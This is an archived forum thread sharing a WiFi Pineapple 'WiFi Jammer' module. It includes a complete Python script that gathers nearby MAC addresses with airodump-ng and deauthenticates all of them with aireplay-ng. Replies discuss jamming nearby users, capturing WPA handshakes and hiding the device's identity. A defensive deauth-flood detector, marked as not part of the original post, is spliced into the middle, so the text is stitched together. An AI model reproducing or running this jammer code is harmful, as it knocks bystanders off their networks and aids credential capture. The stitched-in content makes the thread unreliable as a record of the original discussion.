This topic is now archived and is closed to further replies.

Whistle Master

Wifi Jammer

Hi there !

I wanted to share with you my last module for the pineapple: a WiFi Jammer ;)

Features
- Using deauth with aireplay
- Whitelist / Blacklist based on regexp
- Autostart

Simplified Usage

- Select the interface to be used from WLAN interface drop-down list (e.g. wlan1).

- Click on Start Monitor.

- Monitor interface drop-down list will be refreshed (e.g. mon0).

- Click on Whitelist tab and click on Refresh link to show APs around and click on APs to be added to your whitelist, which will NOT be DeAuth'ed.

- Click on Start link next to WiFi Jammer disabled

Troubleshooting procedure

1. No APs are found in the Whitelist or Blacklist

Select the interface from WLAN interface drop-down list (e.g. wlan1) and click on Auto to disable and re-enable the interface. Then try again.

2. No APs are DeAuth'ed

Select the interface from WLAN interface drop-down list (e.g. wlan1) and click on Auto to disable and re-enable the interface. Then try again.
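
From the defender's side, the constant deauthentication described in this post shows up as a burst of deauthentication frames attributed to one BSSID. The following is an added example, not part of the original post or the module: a sliding-window detector run over constructed frame records. The `ts,subtype,src,dst,bssid` record format, the thresholds and the MAC addresses are assumptions made for illustration.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
DEAUTH, DISASSOC, BEACON = 12, 10, 8   # 802.11 management frame subtypes


def detect_deauth_floods(lines, window=10.0, threshold=20):
    """Flag BSSIDs with >= threshold deauth/disassoc frames inside `window` seconds.

    Each record is "ts,subtype,src,dst,bssid" (assumed format, e.g. exported
    from a monitor-mode capture). Records must be time-ordered per BSSID.
    """
    recent = defaultdict(deque)          # bssid -> (ts, dst) of recent frames
    alerts = {}
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, subtype, _src, dst, bssid = line.lower().split(",")
        ts, subtype = float(ts), int(subtype)
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[bssid]
        q.append((ts, dst))
        while ts - q[0][0] > window:     # drop frames older than the window
            q.popleft()
        if len(q) >= threshold:
            a = alerts.setdefault(
                bssid, {"first_seen": q[0][0], "peak": 0, "broadcast": False})
            a["peak"] = max(a["peak"], len(q))
            # Deauths addressed to broadcast hit every client of the AP at once.
            a["broadcast"] |= any(d == BROADCAST for _, d in q)
    return alerts


def sample_capture():
    """Constructed records: one quiet AP, one AP hit by a deauth burst."""
    quiet, flooded, client = "02:00:00:00:0a:01", "02:00:00:00:0b:01", "02:00:00:00:0c:01"
    lines = ["# constructed sample, not real capture data"]
    lines += [f"{t}.0,{BEACON},{quiet},{BROADCAST},{quiet}" for t in range(0, 60, 10)]
    lines += [f"5.0,{DEAUTH},{quiet},{client},{quiet}",      # ordinary client leave
              f"50.0,{DEAUTH},{client},{quiet},{quiet}"]
    lines += [f"{20 + i * 0.1:.1f},{DEAUTH},{flooded},{BROADCAST},{flooded}"
              for i in range(40)]                            # 40 frames in 4 s
    return lines


if __name__ == "__main__":
    for bssid, info in detect_deauth_floods(sample_capture()).items():
        print(bssid, info)
```

Where clients and APs support 802.11w (Protected Management Frames), enabling it makes clients discard spoofed deauthentication frames; the detector is still useful for spotting the attempt.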

So you can allow certain connections through with the whitelist, while constantly deauthing others?

Yes, you can add AP(s) in the whitelist which won't be deAuth'ed, while the others will be deAuth'ed constantly :)

EDIT: I also added a blacklist to bring more flexibility to the jammer.

I was working on something extremely similar a few weeks ago but I don't have one of the new pineapples to test it on. I used regular expressions too. I'll post it here and perhaps you could integrate it to the pineapple, no web interface though : P

"""
This script is designed to deauthenticate all macs found in the air
with the exception of whitelisted ones. Input known good client and
AP and all other MACs on 2.4 ghz in the area are denied service. 
"""

import subprocess
import time
import sys
import re

iface = 'mon0'

# List of macs to deauth
todeauth = []

# Don't deauth
mymac = ''
myap = ''

searchmac = re.compile(r'([a-fA-F0-9]{2}[:|\-]){5}[a-fA-F0-9]{2}')

# Takes all macs from airodump-ng stderr and puts them into list
def grabMacs():
    proc = subprocess.Popen(['airodump-ng',
                             '%s' % iface],
                            stdout = subprocess.PIPE,
                            stderr = subprocess.PIPE,
                            executable='/usr/sbin/airodump-ng')
    print('one second. im thinking...')
    time.sleep(10)
    for x in proc.stderr:
        a = searchmac.search(x)
        if a:
            todeauth.append(x[a.start():a.end()])
            print(x[a.start():a.end()])
        elif len(todeauth) > 15: break
    sys.stdout.flush()

# Takes all macs from airodump-ng output csv file and puts into list
def snabMacs():
    subprocess.Popen(['airodump-ng',
                     '-w', 'test1234-01.csv',
                     iface],
                     stderr = subprocess.PIPE)
    print('collecting MACs for 10 seconds...')
    time.sleep(10)
    file = open('test1234-01.csv-01.csv')
    for x in file:
        a = searchmac.search(x)
        if a:
            print(x[a.start():a.end()])
            todeauth.append(x[a.start():a.end()])

# Deauth all targets in todeauth list from grabMacs or snabMacs
# function. Will remove known good macs as mymac and myap input.
def massDeauth(todeauth, mymac, myap):
    if myap in todeauth:
        todeauth.remove(myap)
        print('known good ap was successfully removed from deauth list')
    elif mymac in todeauth:
        todeauth.remove(mymac)
        print('known good mac was sucessfully removed from deauth list')
    elif len(todeauth) > 0:
        print('starting deauths')
        for x in todeauth:
            proc = subprocess.Popen(['aireplay-ng',
                                     '-0','0','-a',
                                    x, iface],
                                    stdout = subprocess.PIPE,
                                    stderr = subprocess.PIPE)
            print('deauthing...')
            proc.terminate()


snabMacs()
time.sleep(3.5)
massDeauth(todeauth, mymac, myap)

I was working on something extremely similar a few weeks ago but I don't have one of the new pineapples to test it on. I used regular expressions too. I'll post it here and perhaps you could integrate it to the pineapple, no web interface though : P

Thanks for your input. However, I made everything in shell scripts to keep CPU / memory footprint as low as possible :)

Do we need an extra wi-fi card/ pineapple to both block/use karma?

For the moment yes, because aireplay-ng does not work properly and you have to switch off / on the monitor interface before using it. But then, karma won't work anymore until the next reboot.

Cool whistlemaster. Never tried it using bash. This week I am going to start working on one that uses pylorcon to send the deauth packets so there is no dependency on aireplay-ng.

Posted · Hidden by Whistle Master, May 25, 2012 - No reason given

I have a version ready to be tested; for those interested, please send me a PM.

Just what the doctor (and 2.3.1!) ordered! Thanks for the update WM!

telot

Would I be right in saying that you can't browse the web whilst the router is jamming even if the router's address is added to the white list? Also the jammer does jam its own AP by default, right? Awesome tool btw, thanks.

- Anton

Thank you very much for even more ways to use Jasager (when I finally get my USB>UART adapter to flash my ALFA)

How effective is it? I can imagine that only the A/Ps with the best signals will get a deauth.

Would I be right in saying that you can't browse the web whilst the router is jamming even if the router's address is added to the white list? Also the jammer does jam its own AP by default, right? Awesome tool btw, thanks.

- Anton

APs on the whitelist are not DeAuth'ed, so you should still be able to browse the internet through an AP that is not DeAuth'ed. By default, everything is DeAuth'ed :)

Thank you very much for even more ways to use Jasager (when I finally get my USB>UART adapter to flash my ALFA)

How effective is it? I can imagine that only the A/Ps with the best signals will get a deauth.

APs in sight of the pineapple will be DeAuth'ed.

hey WM great module:-D sorry I couldn't test last week:-(

2 things the link start monitor is cut, box needs to be wider I think.

and after starting the module using the NHA mon0 "btw works great and I was able to successfully whitelist the pineapple" when you press stop it's still running?

ps.

one thing I would love to see is a deauth mode that is controllable? as in run every 10 minutes deauthing only 1 to 5 packets so that I don't piss off too many people, also maybe there is a command one could pass using the button module to run jammer the one time/for 1 minute

just a thought.

2 things the link start monitor is cut, box needs to be wider I think.

and after starting the module using the NHA mon0 "btw works great and I was able to successfully whitelist the pineapple" when you press stop it's still running?

Could you please send me a screenshot of the problem ? I'm testing my modules only with Firefox, assuming not too many people are using IE :-P

The stop button should stop everything, maybe with a little delay, because of the auto-refresh running, which continuously sends requests.

ps.

one thing I would love to see is a deauth mode that is controllable? as in run every 10 minutes deauthing only 1 to 5 packets so that I don't piss off too many people, also maybe there is a command one could pass using the button module to run jammer the one time/for 1 minute

just a thought.

Nice idea! I will have a look to add some settings :)

Could you please send me a screenshot of the problem ? I'm testing my modules only with Firefox, assuming not too many people are using IE :-P

The stop button should stop everything, maybe with a little delay, because of the auto-refresh running, which continuously sends requests.

Nice idea! I will have a look to add some settings :)

I am using firefox too v13.0.1

well it says it's stopped but my phone will continue to get deauthed, I left it for just over a minute, then stopped the monitor interface and that ended deauthing but I would imagine it's still running

I am using firefox too v13.0.1

well it says it's stopped but my phone will continue to get deauthed, I left it for just over a minute, then stopped the monitor interface and that ended deauthing but I would imagine it's still running

Could you do a quick test: start the module from the web interface, then ssh to your pineapple and issue the following commands:

ps auxww

ps auxww | grep jammer.sh | grep -v -e grep | grep -v -e php

Then stop the module from the web interface and issue the same above commands from ssh and post all the output.

Thanks ;)

A new version will be out soon with new functionalities to control the jammer: sleeping time & number of deauths to send.

A new version will be out soon with new functionalities to control the jammer: sleeping time & number of deauths to send.

Perfect for automatically capturing WPA handshakes :D

Is this module available for mk3? or maybe it can be easily ported.

No.

It could theoretically be ported but the module system is not available on the MK3 and may not ever fully be.

I am still hoping to bring out one last version of the MK3 firmware - it just takes a lot of time.

Best,

Sebkinne

does this fake the mac address before sending deauth packets out? Good tool, however, just want to make sure that it hides the correct pineapple identity..

how about a short tutorial? I can't seem to get this one working. I can, however, use my netbook and deauth my router. Just think it would be cool to be able to do it all from the pineapple. I assume WhistleMaster has it going. Oh, to be a guru of helmholtz resonation. I can't even get the damn awus 036h to work with my pineapples.
